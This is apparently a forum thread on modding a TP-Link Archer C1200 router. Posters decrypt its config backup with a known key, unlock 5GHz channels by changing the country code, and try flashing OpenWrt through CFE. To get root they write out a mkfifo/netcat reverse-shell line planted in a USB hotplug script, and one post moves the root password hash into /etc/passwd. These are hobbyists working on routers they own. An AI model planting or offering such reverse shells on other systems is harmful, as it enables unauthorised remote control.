Build for TP-Link Archer C1200-AC1200

I am using virtualbox (ubuntu gotten from ^osboxes.org^, login pass is ^osboxes.org^).

First, I open the Terminal,

sudo apt-get install gcc make build-essential

wget https**://zlib.net/zlib-1.2.11.tar.gz (err, cause I am new user, I can't post more than 2 links, I assume you know how to remove the ** )
tar xvzf zlib-1.2.11.tar.gz
cd zlib-1.2.11
./configure
sudo make install

cd ..
wget https://www.openssl.org/source/openssl-1.1.1-pre2.tar.gz
tar xvzf openssl-1.1.1-pre2.tar.gz
cd openssl-1.1.1-pre2

./config --prefix=/usr
--openssldir=/etc/ssl
--libdir=lib
shared
zlib-dynamic &&
make

sudo make install

Next, time to uncompress/decrypt:

openssl aes-256-cbc -d -in config.bin -k 'Archer C1200' | openssl zlib -d -out config.tar
Whatever you do, don't copy paste from this forum. The apostrophe symbol issue is pain in ass


See the issue? The first one has wrong apostrophe (if one copy-paste from the forum). The second bottom line has correct apostrophe.

tar xf config.tar

Well....edit the stuff extracted from config.tar....edit ori-backup-user-config.bin to your liking.

Then open up the config.tar , delete the ori-backup-user-config.bin, drag and drop your edited ori-backup-user-config.bin into config.tar

Time to repack/reencrypt again

openssl zlib -in config.tar | openssl aes-256-cbc -out config.bin -k 'Archer C1200'

Careful on the apostrophe

1 Like

Thanks for your guide, finally managed to get my SSH working but I used OpenSSL 1.0.2m instead of 1.1.1-pre2, guess the engineers encrypted V1 with a different version instead.

BTW, do u happen to be a Malaysian too by any chance?

Yes. But that is irrelevant.
Even with ssh access, there is nothing much we can do without root access.

root access can be achieved by getting a service or event to execute a shell and pipe it over netcat to a computer.

I used /etc/hotplug.d/usb/10-usb and then plugged in a usb stick to force the event.

on the computer I executed:

nc -l -p 12345

in the 10-usb file I added:

mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.1 12345 > /tmp/f

I'm going to look into persisting changes on boot by using the overlay

@quaqo probably has a better way.

3 Likes

In conjunction with root access method given by @drush , I am able to determine wifi capability without going through all the way of backup,decrypt,untar,edit,encrypt,restore steps.

Apparently, different country code has different 5ghz channel available. When I changed the code to MY and edited channel to 120, 136, 165, it ended up in failure because Broadcom wifi firmware country code does not allow such channel to be valid.

It turns out Malaysia country code in broadcom firmware only contains channel 36, 38, 40, 44, 48, 149, 153, 157 and 161.

Strangely enough, if Bahamas BS code is specified, the router will ended up not being able to restore the edited.bin settings

edit: anyone wanna prepare a list of country code available with 5ghz channel from this c1200 wifi firmware? I wonder which country code has the most 5ghz wifi channel......

mine has only 36, 38, 40, 44, 48 eu firmware.. would be great if there was a way to use other channels.

Please do the following on CABLE, not wireless

  1. Please make a backup of config.bin (unmolested, clean and virgin)

Must use root mode. Follow @drush guide.
As admin mode ssh admin@192.168.x.x in ssh access, edit /etc/hotplug.d/usb/10-usb via VIM (vim keyboard shortcut a pain in ass) to add mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.x.x 12345 > /tmp/f at the bottom and save it. Don't ask me how to use VIM, I have hard time myself.
Change 192.168.x.x to the IP address of your linux system

In my case, I decided to use Rufus + Ubuntu live cd.

Using sudo -i to enter root mode at ubuntu before running nc -l -p 12345
Plug in a usb pendrive to the router and voila, ubuntu terminal will get connected to the router.

uci show wireless
uci set wireless.eth2.country=MY
uci set wireless.eth3.country=MY
uci set wireless.eth2.channel=auto --->for a good reason, you can change it later.
uci commit wireless; wifi ----> this will reload the wifi interface.

EDIT: I forgot the mention the most important part. Need to restart uhttpd server before the following step of uploading a modified config.bin:
/etc/init.d/uhttpd restart
***Otherwise, TP-Link webui will reject the modified config.bin in the following step below.

Now, the pain in ass issue, remember the previous ori-backup-user-config.bin from few posts ago? Yeah.....one needs to edit that as well ;
<country>MY</country> ---> for both 2.4ghz and 5ghz
Set <channel>auto</channel> for 5ghz
Re-tar,recompress,re-encrypt.

Open up tplink 192.168.0.1, and restore the edited config.bin

voila, EU firmware get persisted MY channel 36, 38, 40, 44, 48, 149, 153, 157 and 161

Otherwise, if one simply edits config.bin's ori-backup-user-config.bin country code and 'restore' it, it will not get 'activated' after 'restore'. The uci commit step must be done first.

1 Like

Can anyone help me to find out what is written into config.bin when webui is sending {"value": "AR", "name": "ARGENTINA", "no_autodetect": true}
This "no_autodetect": true probably disables DFS or TPC or both.

Example, TM Malaysia C1200 firmware can support channel 36, 40, 44, 48, 100, 120, 161, 165 using BS country code.

However, in EU C1200 firmware, simply changing to BS country code will display 36, 40, 44, 48 only. Directly changing to MY country code will display 36, 38, 40, 44, 48, 149, 153, 157 and 161. So, I suspect my EU firmware config.bin is missing critical parameter in enabling missing 5ghz band 2A and 2C

Another strange issue, changing the code to TW causes 2.4ghz wifi to stop functioning (in the config.bin, channel 1 is selected for 2.4ghz interface). TW 5ghz will automatically pick one of band 2A channel and function normally.

Hi, I have the v2 (EU) of the Archer C1200. It appears to be rather simmilar to v1, according to wikidev it uses the BCM47189 instead of the BCM47189B0.

I have access to the serial console and would like to try how far I get with the build for v1.
But before I do that, what's the recovery procedure?

Can I flash back the factory image using CFE?

I've tried TFTP loading the initramfs on v2, but it would not boot.

CFE> boot -tftp 192.168.9.133:openwrt-bcm53xx-tplink-archer-c1200-v1-initramfs.trx
Loader:raw Filesys:tftp Dev:eth0 File:192.168.9.133:openwrt-bcm53xx-tplink-archer-c1200-v1-initramfs.trx Options:(null)
Loading: ........... 262144 bytes read
Entry at 0x20000000
Closing network.
Starting program at 0x20000000

It also gets stuck there if I try build_dir/target-arm_cortex-a9_musl_eabi/linux-bcm53xx/vmlinux-initramfs

CFE> boot -tftp 192.168.9.133:vmlinux-initramfs
Loader:raw Filesys:tftp Dev:eth0 File:192.168.9.133:vmlinux-initramfs Options:(null)
Loading: ........... 262144 bytes read
Entry at 0x20000000
Closing network.
Starting program at 0x20000000

I'm wondering why it's only reading 256kB when the files are in fact much larger.

Never managed to figure out boot command, seems broken to me/looking in bad direction.
I'm testing my fw by using: flash -noheader ipaddr:filename flash0.trx
that flashes the file without checking.
For going back to stock, just restart modem and spam reboot button until firmware recovery starts, then upload original firmware

What is flash0.trx? Is it a renamed file generated by the OpenWRT image builder?

That's where firmware partition starts

Ah, didn't see the ipaddr:filename in front of it.

I guess you are flashing the squashfs.bin file?

btw, I managed to get the boot / load command to load the entire file by also specifying the address:

CFE> load -addr=0x20000000 -max=3428352 -tftp 192.168.9.133:openwrt-bcm53xx-tplink-archer-c1200-v1-initramfs.trx
Loader:raw Filesys:tftp Dev:eth0 File:192.168.9.133:openwrt-bcm53xx-tplink-archer-c1200-v1-initramfs.trx 
Options:(null)
Loading: ........... 3428352 bytes read
Entry at 0x20000000
*** command status = 0

However, it would still not boot.

CFE> go
Closing network.
Starting program at 0x20000000

edit: Thinking about it, it makes sense as the initramfs will probably load data to that region of memory too, and in doing so overwrite itself.

So I've flashed your archer-c1200-v1-initramfs.trx to the flash of my v2 router and it boots!
dmesg

Ethernet is working, USB is working but for WiFi only scanning the 2.4GHz band works, neither sta nor ap mode result in a link, but you had the same problem. Also the polarity of the LEDs appears to be reversed. (Writing 0 to brightness turns them on, 255 turns them off)

I've also successfully flashed the factory firmware using the CFE web based recovery. (The http server will only listen on 192.168.0.1, so I couldn't access it after changing the ip with ifconfig)
dmesg of the factory firmware

1 Like

Squashfs is quite tricky, managed to boot it, but it threw few errors I mentioned above, however initramfs goes well

Hey,

Anyone have updates on this? I see the chip in question is in the target for 17.01.4 but I don't see this specific router on the list.
Has anyone been able to actually install OpenWRT on it? If so, how?
Are there plans to support this router? I can't find a wiki page for it (also, tp-link's naming scheme doesn't help)

Also interested in a build for C1200-AC1200 v2 model.
By the way has anybody tried to build GPL code provided by manufacturer? I tried a couple of times but failed.

I don't know if this has any relevancy but Tenda AC9 which i supported seems to have very similar hardware to TP-Link Archer C1200 V1

Hi All!

I'm a user of ASUS N16 with OpenWrt worked very good without any troubles

Recently I bought C1200 V2 EU router to get 5G WiFi band.
In my case change of the country code to MY only for 5G band settings was enough to unlock channels, 149, 153, 157 and 161.
As there is no OpenWrt support for this hardware and most probably it will not come, so the only way to make any other fixes/updates is to apply changes on fly.
My router work in my home network in AP mode with DHCP and DNS.
While TPLINK firmware is based on OpenWrt, it's GUI looks terrible and lucks a lot of futures, which existed in OpenWrt for years. For example, there is no way to control any advanced settings like firewall, MAC address settings for DHCP, DNS, etc when switch to AP mode. With default settings working firewall doesn't allow router dnsmasq to serve DNS requests for the local devices, all DNS requests are just forwarded to the upper gateway and all local device names always failed to resolve.

It is much easier to make any changes with root ssh access.

Many thanks to quaqo and ashleylai87 for details instructions how to activate ssh and get root.

Firmware dropbear (ssh) server is built without shadow support, so in order to allow ssh root login, changing setting:

<SysAccountLogin>on</SysAccountLogin>

is not enough. The root password should be copied from /etc/shadow to /etc/passwd file.
if you want admin user access in this mode, the shell for the admin acc in /etc/passwd file should be changed from /bin/false to /bin/ash

Also firmware proftpd server is build without sftp support, which make access to the router files from wan totally unsafe, busybox luck some applets.

I already managed to build some applications with missed futures activated, thanks to the GPL code from TpLink.
My plan (maximum) is after some testing to rebuild root-fs and upload it to the router, without touching the u-boot and kernel partitions.

Update:
I put some applications here:
https://mega.nz/#F!sQt1CIqD!w1Y-m-gm5srWybXFrlog6g

Rebuilt from TPLINK GPL sources

  • busybox built with maximum applets
  • dnsmasq with IPv6 support
  • dropbear with shadow and compression
  • proftpd with sftp and tls modules and IPv6 support

Other applications

  • tcpdump v4.2.1 mini build
  • minidlnad v1.2.1 (firmware version 1.1.2)

Kind Regards
D

2 Likes

I would be amazingly thankful for at least minimal guide how to properly build GPL sources. (I had some experience with gcc and I'm linux user). And how you're making changes to busybox, because I want to make at least the same for router Touch P5, which as I know is similar to this one.

There is some information that I've got from it, maybe you'll have any ideas what to do next

Thanks in advance.